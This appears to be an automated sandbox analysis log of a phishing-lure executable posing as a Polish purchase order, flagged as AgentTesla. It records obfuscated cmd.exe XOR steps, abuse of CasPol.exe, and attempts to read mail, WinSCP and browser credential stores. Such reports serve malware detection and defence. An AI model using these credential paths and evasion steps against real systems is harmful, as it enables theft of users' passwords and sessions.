            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5424, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
